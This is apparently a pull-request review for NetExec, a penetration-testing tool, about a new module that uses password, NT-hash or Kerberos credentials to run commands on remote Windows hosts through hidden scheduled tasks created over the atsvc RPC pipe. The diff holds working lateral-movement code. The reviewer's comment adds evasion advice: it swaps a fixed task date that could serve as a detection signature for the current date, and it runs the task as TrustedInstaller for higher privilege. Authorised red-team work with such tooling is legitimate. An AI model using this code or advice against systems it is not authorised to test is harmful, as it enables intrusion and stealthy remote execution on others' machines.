nxc/modules/schtask.py

```diff
@@ -0,0 +1,273 @@
+                "C$" # This one shouldn't be hardcoded but I don't know where to retrive the info
+            )
+
+            output = exec_method.execute(self.cmd, True)
+            try:
+                if not isinstance(output, str):
+                    output = output.decode(connection.args.codec)
+            except UnicodeDecodeError:
+                self.logger.fail("Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings")
+            self.logger.highlight(output)
+
+        except Exception as e:
+            self.logger.fail(f"Error executing command via atexec, traceback: {e}")
+
+class TSCH_EXEC:
+    def __init__(self, target, share_name, username, password, domain, user, cmd, doKerberos=False, aesKey=None, kdcHost=None, hashes=None, logger=None, tries=None, share=None):
+        self.__target = target
+        self.__username = username
+        self.__password = password
+        self.__domain = domain
+        self.__share_name = share_name
+        self.__lmhash = ""
+        self.__nthash = ""
+        self.__outputBuffer = b""
+        self.__retOutput = False
+        self.__aesKey = aesKey
+        self.__doKerberos = doKerberos
+        self.__kdcHost = kdcHost
+        self.__tries = tries
+        self.__output_filename = None
+        self.__share = share
+        self.logger = logger
+        self.cmd = cmd
+        self.user = user
+
+        if hashes is not None:
+            # This checks to see if we didn't provide the LM Hash
+            if hashes.find(":") != -1:
+                self.__lmhash, self.__nthash = hashes.split(":")
+            else:
+                self.__nthash = hashes
+
+        if self.__password is None:
+            self.__password = ""
+
+        stringbinding = f"ncacn_np:{self.__target}[\\pipe\\atsvc]"
+        self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
+
+        if hasattr(self.__rpctransport, "set_credentials"):
+            # This method exists only for selected protocol sequences.
+            self.__rpctransport.set_credentials(
+                self.__username,
+                self.__password,
+                self.__domain,
+                self.__lmhash,
+                self.__nthash,
+                self.__aesKey,
+            )
+            self.__rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
+
+    def execute(self, command, output=False):
+        self.__retOutput = output
+        self.execute_handler(command)
+        return self.__outputBuffer
+
+    def output_callback(self, data):
+        self.__outputBuffer = data
+
+    def gen_xml(self, command, fileless=False):
+        xml = f"""<?xml version="1.0" encoding="UTF-16"?>
+<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+  <Triggers>
+    <CalendarTrigger>
+      <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
```

Comment:
This looks good, seems to do something similar to ATExec. Some opsec considerations, there is a hardcoded date in the XML used to build the scheduled task

<StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>

we can use a function to generate to get the latest date and build the xml file

something like
`
def get_current_date():
                # Get current date and time
                now = datetime.now()
                
                # Format it to match the format in the XML: "YYYY-MM-DDTHH:MM:SS.ssssss"
                return now.strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3]


current_date = get_current_date()
            xml = """<?xml version="1.0" encoding="UTF-16"?>
    <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
    <Triggers>
        <CalendarTrigger>
        <StartBoundary>{}</StartBoundary>
        <Enabled>true</Enabled>
        <ScheduleByDay>
            <DaysInterval>1</DaysInterval>
        </ScheduleByDay>
        </CalendarTrigger>
    </Triggers>
    <Principals>
        <Principal id="LocalSystem">
        <UserId>S-1-5-18</UserId>
        <RunLevel>HighestAvailable</RunLevel>
        </Principal>
    </Principals>
    <Settings>
        <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
        <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
        <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
        <AllowHardTerminate>true</AllowHardTerminate>
        <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
        <IdleSettings>
        <StopOnIdleEnd>true</StopOnIdleEnd>
        <RestartOnIdle>false</RestartOnIdle>
        </IdleSettings>
        <AllowStartOnDemand>true</AllowStartOnDemand>
        <Enabled>true</Enabled>
        <Hidden>true</Hidden>
        <RunOnlyIfIdle>false</RunOnlyIfIdle>
        <WakeToRun>false</WakeToRun>
        <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
        <Priority>7</Priority>
    </Settings>
    <Actions Context="LocalSystem">
        <Exec>
        <Command>%s</Command>
        <Arguments>%s</Arguments>
        </Exec>
    </Actions>
    </Task>
            """.format(current_date)`
            
   
   
   Lastly, i have not fully went through the module to see how your doing it, but we can also swap out the principal id from LocalSystem to "TrustedInstaller" . you also need to change the sid to "S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464". Just another option for more privileges